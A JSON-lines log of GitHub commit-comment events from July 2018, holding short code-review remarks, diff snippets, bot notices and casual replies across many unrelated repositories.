{"id":"7917119823","type":"CommitCommentEvent","actor":{"login":"shivanibhanwal"},"repo":{"name":"crossroads/stock.goodcity"},"payload":{"comment":{"id":29591738,"position":5,"line":137,"path":"Rakefile","commit_id":"4c062be9eccff68d8893384c7801f06def7fd5ba","created_at":"2018-07-04T08:51:32Z","updated_at":"2018-07-04T08:51:32Z","author_association":"MEMBER","body":"@Darshan-Chauhan --codeSignIdentity='iPhone Developer' should be only in case of staging. For prod it should be \"iPhone Distribution\". Just noticed this now."}},"created_at":"2018-07-04T08:51:32Z"}
{"id":"7917120464","type":"CommitCommentEvent","actor":{"login":"mercer1976"},"repo":{"name":"fb55/htmlparser2"},"payload":{"comment":{"id":29591742,"position":null,"line":null,"path":null,"commit_id":"8e616cd8625be5b75502ae5dcc8e515d04bc70df","created_at":"2018-07-04T08:51:39Z","updated_at":"2018-07-04T08:51:39Z","author_association":"NONE","body":"\t\t@@ -46,6 +46,7 @@ var openImpliesClose = {\r\n\r\n\t+\tstrong  : { p:true },\r\n"}},"created_at":"2018-07-04T08:51:39Z"}
{"id":"7917121622","type":"CommitCommentEvent","actor":{"login":"sooti"},"repo":{"name":"aosp-tissot/frameworks_base"},"payload":{"comment":{"id":29591743,"position":null,"line":null,"path":null,"commit_id":"6182caa55d808c642d6e69aa516c808748f9bc9a","created_at":"2018-07-04T08:51:53Z","updated_at":"2018-07-04T08:51:53Z","author_association":"CONTRIBUTOR","body":"There is non, it's a commit, have patients and wait until it's out or pick it yourself :-|"}},"created_at":"2018-07-04T08:51:53Z"}
{"id":"7917126610","type":"CommitCommentEvent","actor":{"login":"tspenov"},"repo":{"name":"santiment/sanbase2"},"payload":{"comment":{"id":29591750,"position":6,"line":114,"path":"lib/sanbase_web/graphql/resolvers/project/project_resolver.ex","commit_id":"d90ea1331d11559be3c472dcf09ce7b95dc8bc7c","created_at":"2018-07-04T08:52:49Z","updated_at":"2018-07-04T08:52:49Z","author_association":"CONTRIBUTOR","body":":facepalm:"}},"created_at":"2018-07-04T08:52:49Z"}
{"id":"7917133413","type":"CommitCommentEvent","actor":{"login":"xtapo"},"repo":{"name":"xtapo/photography"},"payload":{"comment":{"id":29591764,"position":null,"line":null,"path":null,"commit_id":"58b1b139f88ad1cc1445cc69a3e892be71830ccd","created_at":"2018-07-04T08:54:10Z","updated_at":"2018-07-04T08:54:10Z","author_association":"OWNER","body":"ok"}},"created_at":"2018-07-04T08:54:10Z"}
{"id":"7917139906","type":"CommitCommentEvent","actor":{"login":"Darshan-Chauhan"},"repo":{"name":"crossroads/stock.goodcity"},"payload":{"comment":{"id":29591782,"position":5,"line":137,"path":"Rakefile","commit_id":"4c062be9eccff68d8893384c7801f06def7fd5ba","created_at":"2018-07-04T08:55:22Z","updated_at":"2018-07-04T08:55:22Z","author_association":"CONTRIBUTOR","body":"Yeah @shivanibhanwal  , but it says here that it should be \"iPhone Developer\" for both `debug` and `release` so hardcoded it for both. If it fails for production then we can push the change.\r\n\r\nReference:- https://cordova.apache.org/docs/en/latest/guide/platforms/ios/"}},"created_at":"2018-07-04T08:55:22Z"}
{"id":"7917141200","type":"CommitCommentEvent","actor":{"login":"amarkevich"},"repo":{"name":"Talend/tdi-studio-se"},"payload":{"comment":{"id":29591793,"position":null,"line":null,"path":null,"commit_id":"0f66f5569db5cf63a00933d44e84140cfd0033dc","created_at":"2018-07-04T08:55:36Z","updated_at":"2018-07-04T08:55:36Z","author_association":"MEMBER","body":"Since Java 7 there is java.util.Objects.equals(a, b)"}},"created_at":"2018-07-04T08:55:36Z"}
{"id":"7917154645","type":"CommitCommentEvent","actor":{"login":"netskopegittest1"},"repo":{"name":"Scaleskope-Ind/Org_Apic_Auto_Repo"},"payload":{"comment":{"id":29591814,"position":1,"line":1,"path":"new_test_1530694669.txt","commit_id":"61cf2ce396b17adbeb0a9ea81defb9eb3dc6e566","created_at":"2018-07-04T08:58:01Z","updated_at":"2018-07-04T08:58:01Z","author_association":"NONE","body":"Needs to be change this!!!"}},"created_at":"2018-07-04T08:58:01Z"}
{"id":"7917156459","type":"CommitCommentEvent","actor":{"login":"HonorXu"},"repo":{"name":"HonorXu/spring"},"payload":{"comment":{"id":29591819,"position":null,"line":null,"path":null,"commit_id":"88f201402852efee63ba02fb04f4d6060352dc46","created_at":"2018-07-04T08:58:23Z","updated_at":"2018-07-04T08:58:23Z","author_association":"OWNER","body":"不依赖DemoRequestParam注解,自动匹配请求参数,自定义类型暂不支持\r\n\r\nbefore jdk1.8  使用javassist获取函数参数名称 \r\nafter jdk1.8 使用Method.getParameters\r\n"}},"created_at":"2018-07-04T08:58:23Z"}
{"id":"7917156673","type":"CommitCommentEvent","actor":{"login":"andreasohlund"},"repo":{"name":"ParticularLabs/EndToEndReliability"},"payload":{"comment":{"id":29591820,"position":null,"line":null,"path":null,"commit_id":"fbedc88c8e08f540942b7b7d72e4a1690dcf6a16","created_at":"2018-07-04T08:58:25Z","updated_at":"2018-07-04T08:58:25Z","author_association":"COLLABORATOR","body":"Perhaps add it to the gitignore file?"}},"created_at":"2018-07-04T08:58:25Z"}
{"id":"7917157609","type":"CommitCommentEvent","actor":{"login":"shivanibhanwal"},"repo":{"name":"crossroads/stock.goodcity"},"payload":{"comment":{"id":29591823,"position":5,"line":137,"path":"Rakefile","commit_id":"4c062be9eccff68d8893384c7801f06def7fd5ba","created_at":"2018-07-04T08:58:35Z","updated_at":"2018-07-04T08:58:35Z","author_association":"MEMBER","body":"Ok sounds good. Wow I was reading same page but I was also refering there `packageType` section if that is something is important to have and we do not have right now."}},"created_at":"2018-07-04T08:58:35Z"}
{"id":"7917162753","type":"CommitCommentEvent","actor":{"login":"a8814549"},"repo":{"name":"forezp/SpringcloudConfig"},"payload":{"comment":{"id":29591835,"position":null,"line":null,"path":null,"commit_id":"a68876a6211369bae723348d5f8c3defe4a55e04","created_at":"2018-07-04T08:59:32Z","updated_at":"2018-07-04T08:59:32Z","author_association":"NONE","body":"foo = foo版本2\r\ndemoconfigclient.message =你好春天io"}},"created_at":"2018-07-04T08:59:32Z"}
{"id":"7917162771","type":"CommitCommentEvent","actor":{"login":"mercer1976"},"repo":{"name":"fkling/astexplorer"},"payload":{"comment":{"id":29591836,"position":null,"line":null,"path":null,"commit_id":"2d2b55d9465d623c492d8aeeca03a24f0b70ca40","created_at":"2018-07-04T08:59:32Z","updated_at":"2018-07-04T08:59:32Z","author_association":"NONE","body":"13  website/src/parsers/js/recast.js\r\n @@ -35,6 +35,7 @@ export default {\r\n    },\r\n  \r\n    parse({ recast, parsers }, code, options) {\r\n +    options = {...options}; // a copy is needed since we are mutating options\r\n      const flowOptions = options.flow;\r\n      const babylon6Options = options.babylon6;\r\n      const babylon7Options = options.babylon7;\r\n @@ -43,9 +44,6 @@ export default {\r\n      delete options.babylon7;\r\n  \r\n      switch (options.parser) {\r\n -      case 'esprima':\r\n -        delete options.parser; // default parser\r\n -        break;\r\n        case 'flow':\r\n          options.parser = {\r\n            parse(code) {\r\n @@ -67,8 +65,13 @@ export default {\r\n            },\r\n          };\r\n          break;\r\n -      default:\r\n +      case 'babel5':\r\n          options.parser = parsers[options.parser];\r\n +        break;\r\n +      case 'esprima':\r\n +      default:\r\n +        delete options.parser; // default parser\r\n +        break;\r\n      }\r\n      return recast.parse(code, options);\r\n    },\r\n @@ -111,7 +114,7 @@ export default {\r\n    _getSettingsConfiguration(defaultOptions) {\r\n      return {\r\n        fields: [\r\n -        ['parser', ['esprima', 'babel5', 'babylon6', 'flow']],\r\n +        ['parser', ['esprima', 'babel5', 'babylon6', 'babylon7', 'flow']],\r\n          'range',\r\n          'tolerant',\r\n          {"}},"created_at":"2018-07-04T08:59:32Z"}
{"id":"7917168213","type":"CommitCommentEvent","actor":{"login":"kelihlodversson"},"repo":{"name":"th-otto/pTOS"},"payload":{"comment":{"id":29591850,"position":4,"line":26,"path":"bios/memory_rpi.S","commit_id":"e6138ce49b553a8fd22593dc5417b2d84fa2b7d7","created_at":"2018-07-04T09:00:30Z","updated_at":"2018-07-04T09:00:30Z","author_association":"NONE","body":"I removed all of this originally as the raspberry PI is in principle always warm-booted, since it is launched by the videocore bootloader and does not need to initialize the hardware. "}},"created_at":"2018-07-04T09:00:30Z"}
{"id":"7917172281","type":"CommitCommentEvent","actor":{"login":"parkkiseok"},"repo":{"name":"parkkiseok/-"},"payload":{"comment":{"id":29591862,"position":null,"line":null,"path":null,"commit_id":"50deafe496b616b2bcf02c734a7899e9db4f6249","created_at":"2018-07-04T09:01:14Z","updated_at":"2018-07-04T09:01:14Z","author_association":"OWNER","body":"ㅍ퓨퓨"}},"created_at":"2018-07-04T09:01:14Z"}
{"id":"7917172318","type":"CommitCommentEvent","actor":{"login":"Vit91"},"repo":{"name":"Vit91/MIPT-MachineLearning"},"payload":{"comment":{"id":29591863,"position":null,"line":null,"path":null,"commit_id":"a26faa70fcddf291d78af1b84b7a6ebfd598b42b","created_at":"2018-07-04T09:01:14Z","updated_at":"2018-07-04T09:01:14Z","author_association":"OWNER","body":"Study Materials"}},"created_at":"2018-07-04T09:01:14Z"}
{"id":"7917175129","type":"CommitCommentEvent","actor":{"login":"jesiuu"},"repo":{"name":"react-toolbox/react-toolbox"},"payload":{"comment":{"id":29591873,"position":4,"line":25,"path":"components/dialog/theme.css","commit_id":"2eb27c71a837e9406c15946c64edc680c2467d73","created_at":"2018-07-04T09:01:46Z","updated_at":"2018-07-04T09:01:46Z","author_association":"NONE","body":"That change causes the long dialogs to stretch out of the window what makes them more than 100% height of the screen."}},"created_at":"2018-07-04T09:01:46Z"}
{"id":"7917175696","type":"CommitCommentEvent","actor":{"login":"kelihlodversson"},"repo":{"name":"th-otto/pTOS"},"payload":{"comment":{"id":29591876,"position":null,"line":null,"path":null,"commit_id":"e6138ce49b553a8fd22593dc5417b2d84fa2b7d7","created_at":"2018-07-04T09:01:52Z","updated_at":"2018-07-04T09:01:52Z","author_association":"NONE","body":"I don't think we'll need this change at all, since in order to get proper performance out of the PI, we'll need to enable caching and the MMU, which in turn will allow unaligned access directly."}},"created_at":"2018-07-04T09:01:52Z"}
{"id":"7917176248","type":"CommitCommentEvent","actor":{"login":"jesiuu"},"repo":{"name":"react-toolbox/react-toolbox"},"payload":{"comment":{"id":29591880,"position":4,"line":25,"path":"components/dialog/theme.css","commit_id":"2eb27c71a837e9406c15946c64edc680c2467d73","created_at":"2018-07-04T09:01:58Z","updated_at":"2018-07-04T09:01:58Z","author_association":"NONE","body":"We need a max-height"}},"created_at":"2018-07-04T09:01:58Z"}
{"id":"7917187371","type":"CommitCommentEvent","actor":{"login":"kelihlodversson"},"repo":{"name":"th-otto/pTOS"},"payload":{"comment":{"id":29591898,"position":25,"line":1179,"path":"Makefile","commit_id":"ad6c9459f2d048d132f17fe68ce5e77a3af65fbb","created_at":"2018-07-04T09:04:05Z","updated_at":"2018-07-04T09:04:05Z","author_association":"NONE","body":"Can't you make it use the correct compiler?"}},"created_at":"2018-07-04T09:04:05Z"}
{"id":"7917188681","type":"CommitCommentEvent","actor":{"login":"bursevich"},"repo":{"name":"bursevich/js-Prefr"},"payload":{"comment":{"id":29591902,"position":89,"line":89,"path":"ninthLesson/HW9-script.js","commit_id":"840cdb89e25446608d08e12643f4fb2549d38e99","created_at":"2018-07-04T09:04:19Z","updated_at":"2018-07-04T09:04:19Z","author_association":"OWNER","body":"у меня не работало так"}},"created_at":"2018-07-04T09:04:19Z"}
{"id":"7917189387","type":"CommitCommentEvent","actor":{"login":"noahc3"},"repo":{"name":"noahc3/auto-h-encore"},"payload":{"comment":{"id":29591904,"position":null,"line":null,"path":null,"commit_id":"1d55ea2ad7c919a6dfc19c02a690d9d26afbb543","created_at":"2018-07-04T09:04:27Z","updated_at":"2018-07-04T09:04:27Z","author_association":"OWNER","body":"This is great. Thank you for your work!"}},"created_at":"2018-07-04T09:04:27Z"}
{"id":"7917195685","type":"CommitCommentEvent","actor":{"login":"DilipDas-8"},"repo":{"name":"DilipDas-8/InWords"},"payload":{"comment":{"id":29591912,"position":2,"line":2,"path":"README.md","commit_id":"d92fdaac9178c035761e6564682487927e85df31","created_at":"2018-07-04T09:05:29Z","updated_at":"2018-07-04T09:05:29Z","author_association":"OWNER","body":"InWords.php file place your project folder and call this class $inr->Inr(); and put your number there"}},"created_at":"2018-07-04T09:05:29Z"}
{"id":"7917199269","type":"CommitCommentEvent","actor":{"login":"HappyShaker"},"repo":{"name":"ground-x/web3.js"},"payload":{"comment":{"id":29591921,"position":17,"line":142,"path":"packages/web3-core-requestmanager/src/index.js","commit_id":"1e8760faeb41787fc8c1fa87a00fd942a52a3e29","created_at":"2018-07-04T09:06:10Z","updated_at":"2018-07-04T09:06:10Z","author_association":"NONE","body":"질문은 github issue로 일단 빼두었습니다"}},"created_at":"2018-07-04T09:06:10Z"}
{"id":"7917201143","type":"CommitCommentEvent","actor":{"login":"TonnyCool"},"repo":{"name":"TonnyCool/MyProject"},"payload":{"comment":{"id":29591928,"position":null,"line":null,"path":null,"commit_id":"ce9aa0b58b44763aca96cbf728acf65a47afe084","created_at":"2018-07-04T09:06:29Z","updated_at":"2018-07-04T09:06:29Z","author_association":"OWNER","body":"s"}},"created_at":"2018-07-04T09:06:29Z"}
{"id":"7917202001","type":"CommitCommentEvent","actor":{"login":"TonnyCool"},"repo":{"name":"TonnyCool/MyProject"},"payload":{"comment":{"id":29591931,"position":null,"line":null,"path":null,"commit_id":"ce9aa0b58b44763aca96cbf728acf65a47afe084","created_at":"2018-07-04T09:06:38Z","updated_at":"2018-07-04T09:06:38Z","author_association":"OWNER","body":"sdd"}},"created_at":"2018-07-04T09:06:38Z"}
{"id":"7917203683","type":"CommitCommentEvent","actor":{"login":"seburgi"},"repo":{"name":"bitmovin/bitmovin-java"},"payload":{"comment":{"id":29591938,"position":12,"line":60,"path":"src/main/java/com/bitmovin/api/resource/encoding/EncodingMuxingResource.java","commit_id":"782bd8dae090f6caef082826903c711fbf578108","created_at":"2018-07-04T09:06:58Z","updated_at":"2018-07-04T09:06:58Z","author_association":"NONE","body":"@rkersche there is an S missing here"}},"created_at":"2018-07-04T09:06:58Z"}
{"id":"7917205468","type":"CommitCommentEvent","actor":{"login":"TonnyCool"},"repo":{"name":"TonnyCool/MyProject"},"payload":{"comment":{"id":29591941,"position":null,"line":null,"path":null,"commit_id":"82489ce5836d09a713f3aa662653319a1ef8846c","created_at":"2018-07-04T09:07:17Z","updated_at":"2018-07-04T09:07:17Z","author_association":"OWNER","body":"fff"}},"created_at":"2018-07-04T09:07:17Z"}
{"id":"7917206445","type":"CommitCommentEvent","actor":{"login":"seburgi"},"repo":{"name":"bitmovin/bitmovin-java"},"payload":{"comment":{"id":29591947,"position":25,"line":77,"path":"src/main/java/com/bitmovin/api/resource/encoding/EncodingMuxingResource.java","commit_id":"782bd8dae090f6caef082826903c711fbf578108","created_at":"2018-07-04T09:07:27Z","updated_at":"2018-07-04T09:07:27Z","author_association":"NONE","body":"@rkersche  Same here getWebmMuxing -> getWebmMuxings"}},"created_at":"2018-07-04T09:07:27Z"}
{"id":"7917208327","type":"CommitCommentEvent","actor":{"login":"jangorecki"},"repo":{"name":"martakarass/convo"},"payload":{"comment":{"id":29591949,"position":31,"line":31,"path":"man/RunningMean.Rd","commit_id":"4cb448745f4562c77e611997963d7f44b8041555","created_at":"2018-07-04T09:07:49Z","updated_at":"2018-07-04T09:07:49Z","author_association":"NONE","body":"If you don't want to add new dependency this should be fastest base R solution. It will produce incorrect answer if there will be any non-finite values in input. Additionally there is bigger floating point roundoff using this approach.\r\n```r\r\nfastma = function(x, n) {\r\n  nx = length(x)\r\n  cs = cumsum(x)\r\n  scs = c(rep(NA, n), cs[-((nx-n+1):nx)])\r\n  scs[n] = 0\r\n  as.double((cs-scs)/n)\r\n}\r\n```"}},"created_at":"2018-07-04T09:07:49Z"}
{"id":"7917209831","type":"CommitCommentEvent","actor":{"login":"dastanabeuov"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29591952,"position":24,"line":213,"path":"1-Osnovy-Ruby-polnaya-PO/lesson4/interface.rb","commit_id":"b6e701e9fbd98d29afdc25c9ce09cc9320a94372","created_at":"2018-07-04T09:08:07Z","updated_at":"2018-07-04T09:08:07Z","author_association":"OWNER","body":"Da horoso ya zavedu i peredelayu"}},"created_at":"2018-07-04T09:08:07Z"}
{"id":"7917211317","type":"CommitCommentEvent","actor":{"login":"MaheshLamdade"},"repo":{"name":"aniketkhara/html"},"payload":{"comment":{"id":29591955,"position":4,"line":4,"path":"aniket/assignment1.html","commit_id":"c295108a3042b61e464b07b8c592ff0effeb4e55","created_at":"2018-07-04T09:08:23Z","updated_at":"2018-07-04T09:08:23Z","author_association":"NONE","body":"Move CSS to /css folder"}},"created_at":"2018-07-04T09:08:23Z"}
{"id":"7917214341","type":"CommitCommentEvent","actor":{"login":"a8814549"},"repo":{"name":"forezp/SpringcloudConfig"},"payload":{"comment":{"id":29591968,"position":6,"line":5,"path":"respo/config-client-dev.properties","commit_id":"a68876a6211369bae723348d5f8c3defe4a55e04","created_at":"2018-07-04T09:08:58Z","updated_at":"2018-07-04T09:08:58Z","author_association":"NONE","body":"foo = foo版本2\r\ndemoconfigclient.message =你好春天io"}},"created_at":"2018-07-04T09:08:58Z"}
{"id":"7917214510","type":"CommitCommentEvent","actor":{"login":"MaheshLamdade"},"repo":{"name":"aniketkhara/html"},"payload":{"comment":{"id":29591970,"position":21,"line":21,"path":"aniket/assignment1.css","commit_id":"c295108a3042b61e464b07b8c592ff0effeb4e55","created_at":"2018-07-04T09:09:00Z","updated_at":"2018-07-04T09:09:00Z","author_association":"NONE","body":"Indentation"}},"created_at":"2018-07-04T09:09:00Z"}
{"id":"7917216898","type":"CommitCommentEvent","actor":{"login":"MaheshLamdade"},"repo":{"name":"aniketkhara/html"},"payload":{"comment":{"id":29591976,"position":66,"line":66,"path":"aniket/assignment1.css","commit_id":"c295108a3042b61e464b07b8c592ff0effeb4e55","created_at":"2018-07-04T09:09:29Z","updated_at":"2018-07-04T09:09:29Z","author_association":"NONE","body":"indentation\r\n"}},"created_at":"2018-07-04T09:09:29Z"}
{"id":"7917218942","type":"CommitCommentEvent","actor":{"login":"MaheshLamdade"},"repo":{"name":"aniketkhara/html"},"payload":{"comment":{"id":29591980,"position":75,"line":75,"path":"aniket/assignment1.css","commit_id":"c295108a3042b61e464b07b8c592ff0effeb4e55","created_at":"2018-07-04T09:09:50Z","updated_at":"2018-07-04T09:09:50Z","author_association":"NONE","body":"Indentation"}},"created_at":"2018-07-04T09:09:50Z"}
{"id":"7917219295","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/pyarrow-feedstock"},"payload":{"comment":{"id":29591981,"position":null,"line":null,"path":null,"commit_id":"65cb09845d7846293056fb02680845718ff22847","created_at":"2018-07-04T09:09:54Z","updated_at":"2018-07-04T09:09:54Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @pcmoritz were added to conda-forge. Welcome to conda-forge!\"\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @pcmoritz were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-04T09:09:54Z"}
{"id":"7917219532","type":"CommitCommentEvent","actor":{"login":"krixkrix"},"repo":{"name":"ros/dynamic_reconfigure"},"payload":{"comment":{"id":29591982,"position":null,"line":null,"path":null,"commit_id":"0ede11f33bd38a28e4eae843318cb249c571139f","created_at":"2018-07-04T09:09:57Z","updated_at":"2018-07-04T09:09:57Z","author_association":"NONE","body":" dynparam dump: add option --minimal\r\n\r\noption --minimal will dump the configuration in a simple 'key: value' format\r\nwith no group information included\r\n\r\ndumped content example:\r\n\r\n```\r\nmykey1: xxx\r\nmykey2: 1.234\r\nsome_other_key: -1\r\n\r\n```\r\n"}},"created_at":"2018-07-04T09:09:57Z"}
{"id":"7917220645","type":"CommitCommentEvent","actor":{"login":"MaheshLamdade"},"repo":{"name":"aniketkhara/html"},"payload":{"comment":{"id":29591985,"position":29,"line":29,"path":"aniket/assignment1.html","commit_id":"c295108a3042b61e464b07b8c592ff0effeb4e55","created_at":"2018-07-04T09:10:10Z","updated_at":"2018-07-04T09:10:10Z","author_association":"NONE","body":"Indentation"}},"created_at":"2018-07-04T09:10:10Z"}
{"id":"7917222170","type":"CommitCommentEvent","actor":{"login":"derkenbaev"},"repo":{"name":"derkenbaev/hr-crm"},"payload":{"comment":{"id":29591990,"position":null,"line":null,"path":null,"commit_id":"d22f5a1147452753f80f6df9a468c38080b00d84","created_at":"2018-07-04T09:10:27Z","updated_at":"2018-07-04T09:10:27Z","author_association":"OWNER","body":"appSecret is not valid"}},"created_at":"2018-07-04T09:10:27Z"}
{"id":"7917223001","type":"CommitCommentEvent","actor":{"login":"DuckBoss"},"repo":{"name":"DuckBoss/ShaderGraphs_Unity2018"},"payload":{"comment":{"id":29591992,"position":null,"line":null,"path":null,"commit_id":"6ee95c11d3ca563f291eb20a626cbebfae2123d5","created_at":"2018-07-04T09:10:36Z","updated_at":"2018-07-04T09:10:36Z","author_association":"OWNER","body":"Added Glowing Emission Triplanar ShaderGraph"}},"created_at":"2018-07-04T09:10:36Z"}
{"id":"7917225498","type":"CommitCommentEvent","actor":{"login":"MaheshLamdade"},"repo":{"name":"sadeshbodake/Web-design"},"payload":{"comment":{"id":29591996,"position":83,"line":83,"path":"task1.html","commit_id":"174a936486f47b2e6ad958bb0aaa4c4809ef6979","created_at":"2018-07-04T09:11:04Z","updated_at":"2018-07-04T09:11:04Z","author_association":"NONE","body":"No extra spaces needed here"}},"created_at":"2018-07-04T09:11:04Z"}
{"id":"7917230301","type":"CommitCommentEvent","actor":{"login":"mvlabat"},"repo":{"name":"ozkriff/zemeroth"},"payload":{"comment":{"id":29592004,"position":null,"line":null,"path":null,"commit_id":"7d6598884a039e81ef81ac4d0bba6310ee9d4c04","created_at":"2018-07-04T09:11:59Z","updated_at":"2018-07-04T09:11:59Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-04T09:11:59Z"}
{"id":"7917233884","type":"CommitCommentEvent","actor":{"login":"MaheshLamdade"},"repo":{"name":"sadeshbodake/Web-design"},"payload":{"comment":{"id":29592011,"position":1,"line":1,"path":"css/task.css","commit_id":"8d1d39d58b72d6a62581c98b012cf30837a1f72b","created_at":"2018-07-04T09:12:38Z","updated_at":"2018-07-04T09:12:38Z","author_association":"NONE","body":"Always follow this convention as:\r\n.classname {\r\n // Properties \r\n}\r\n\r\nAlso, update the CSS accordingly"}},"created_at":"2018-07-04T09:12:38Z"}
{"id":"7917235457","type":"CommitCommentEvent","actor":{"login":"yexun1995"},"repo":{"name":"noahc3/auto-h-encore"},"payload":{"comment":{"id":29592013,"position":null,"line":null,"path":null,"commit_id":"1d55ea2ad7c919a6dfc19c02a690d9d26afbb543","created_at":"2018-07-04T09:12:56Z","updated_at":"2018-07-04T09:12:56Z","author_association":"CONTRIBUTOR","body":":-) "}},"created_at":"2018-07-04T09:12:56Z"}
{"id":"7917236595","type":"CommitCommentEvent","actor":{"login":"MaheshLamdade"},"repo":{"name":"sadeshbodake/Web-design"},"payload":{"comment":{"id":29592015,"position":39,"line":39,"path":"css/task.css","commit_id":"8d1d39d58b72d6a62581c98b012cf30837a1f72b","created_at":"2018-07-04T09:13:10Z","updated_at":"2018-07-04T09:13:10Z","author_association":"NONE","body":"Why 4 spaces Indentation ? Please update it to 2."}},"created_at":"2018-07-04T09:13:10Z"}
{"id":"7917239767","type":"CommitCommentEvent","actor":{"login":"rikakomoe"},"repo":{"name":"cool2645/shadowsocksrr"},"payload":{"comment":{"id":29592020,"position":null,"line":null,"path":null,"commit_id":"119defdf4bcaeb6741742c13f355838e0efc59e2","created_at":"2018-07-04T09:13:44Z","updated_at":"2018-07-04T09:13:44Z","author_association":"MEMBER","body":"你好 请问为什么要这样改\r\n感觉不对吧\r\n现在我不停地出来 IPV4 [Errno 98] Address in use （实际上并没有）"}},"created_at":"2018-07-04T09:13:44Z"}
{"id":"7917241311","type":"CommitCommentEvent","actor":{"login":"MaheshLamdade"},"repo":{"name":"sadeshbodake/Web-design"},"payload":{"comment":{"id":29592024,"position":84,"line":84,"path":"css/task.css","commit_id":"8d1d39d58b72d6a62581c98b012cf30837a1f72b","created_at":"2018-07-04T09:14:02Z","updated_at":"2018-07-04T09:14:02Z","author_association":"NONE","body":"Not a right practice. Quotes should be completed if used,"}},"created_at":"2018-07-04T09:14:02Z"}
{"id":"7917241356","type":"CommitCommentEvent","actor":{"login":"mrmiad94"},"repo":{"name":"mrmiad94/team1"},"payload":{"comment":{"id":29592025,"position":null,"line":null,"path":null,"commit_id":"3d5ec7370d8618bca07a44b8a989a4efb14827f5","created_at":"2018-07-04T09:14:02Z","updated_at":"2018-07-04T09:14:02Z","author_association":"OWNER","body":"knock\r\nknock2"}},"created_at":"2018-07-04T09:14:02Z"}
{"id":"7917243992","type":"CommitCommentEvent","actor":{"login":"th-otto"},"repo":{"name":"th-otto/pTOS"},"payload":{"comment":{"id":29592030,"position":25,"line":1179,"path":"Makefile","commit_id":"ad6c9459f2d048d132f17fe68ce5e77a3af65fbb","created_at":"2018-07-04T09:14:32Z","updated_at":"2018-07-04T09:14:32Z","author_association":"OWNER","body":"That  compiler might not be installed if you are actually targeting a different platform."}},"created_at":"2018-07-04T09:14:32Z"}
{"id":"7917244848","type":"CommitCommentEvent","actor":{"login":"rikakomoe"},"repo":{"name":"shadowsocksrr/shadowsocksr"},"payload":{"comment":{"id":29592033,"position":null,"line":null,"path":null,"commit_id":"23fea5e329d74c9e2d20604a7777e4ada18a23e3","created_at":"2018-07-04T09:14:41Z","updated_at":"2018-07-04T09:14:41Z","author_association":"NONE","body":"你好 请问为什么要这样改\r\n感觉不对吧\r\n现在我不停地出来 IPV4 [Errno 98] Address in use （实际上并没有）"}},"created_at":"2018-07-04T09:14:41Z"}
{"id":"7917244882","type":"CommitCommentEvent","actor":{"login":"robValtech"},"repo":{"name":"NHS-digital-website/hippo"},"payload":{"comment":{"id":29592034,"position":5,"line":146,"path":"repository-data/application/src/main/resources/hcm-config/hst/configurations/common/sitemap.yaml","commit_id":"4277c63b8091537e8d7b1537642816fe0204990f","created_at":"2018-07-04T09:14:41Z","updated_at":"2018-07-04T09:14:41Z","author_association":"CONTRIBUTOR","body":"In my original (pre-merge conflict) branch This line is \r\n\r\n```hst:componentconfigurationid: hst:pages/hub```"}},"created_at":"2018-07-04T09:14:41Z"}
{"id":"7917246625","type":"CommitCommentEvent","actor":{"login":"Hinako1010"},"repo":{"name":"Hinako1010/TrackYourEC"},"payload":{"comment":{"id":29592038,"position":null,"line":null,"path":null,"commit_id":"b80195637aade15f3ab75bab0c423d39dee1fe55","created_at":"2018-07-04T09:15:01Z","updated_at":"2018-07-04T09:15:01Z","author_association":"OWNER","body":"instructie text is toegevoegd bij de availablecourseactivity en gradedcourseactivity wanneer de lijsten leeg zijn en er is een toolbar toegevoegd aan elke pagina. "}},"created_at":"2018-07-04T09:15:01Z"}
{"id":"7917250339","type":"CommitCommentEvent","actor":{"login":"rikakomoe"},"repo":{"name":"shadowsocksrr/shadowsocksr"},"payload":{"comment":{"id":29592047,"position":null,"line":null,"path":null,"commit_id":"119defdf4bcaeb6741742c13f355838e0efc59e2","created_at":"2018-07-04T09:15:43Z","updated_at":"2018-07-04T09:15:43Z","author_association":"NONE","body":"你好 请问为什么要这样改\r\n感觉不对吧\r\n现在我不停地出来 IPV4 [Errno 98] Address in use （实际上并没有）"}},"created_at":"2018-07-04T09:15:43Z"}
{"id":"7917253388","type":"CommitCommentEvent","actor":{"login":"sadeshbodake"},"repo":{"name":"sadeshbodake/Web-design"},"payload":{"comment":{"id":29592056,"position":83,"line":83,"path":"task1.html","commit_id":"174a936486f47b2e6ad958bb0aaa4c4809ef6979","created_at":"2018-07-04T09:16:18Z","updated_at":"2018-07-04T09:16:18Z","author_association":"OWNER","body":"okay sir !\r\n"}},"created_at":"2018-07-04T09:16:18Z"}
{"id":"7917258793","type":"CommitCommentEvent","actor":{"login":"rikakomoe"},"repo":{"name":"shadowsocksrr/shadowsocksr"},"payload":{"comment":{"id":29592067,"position":null,"line":null,"path":null,"commit_id":"119defdf4bcaeb6741742c13f355838e0efc59e2","created_at":"2018-07-04T09:17:18Z","updated_at":"2018-07-04T09:17:18Z","author_association":"NONE","body":"#27 "}},"created_at":"2018-07-04T09:17:18Z"}
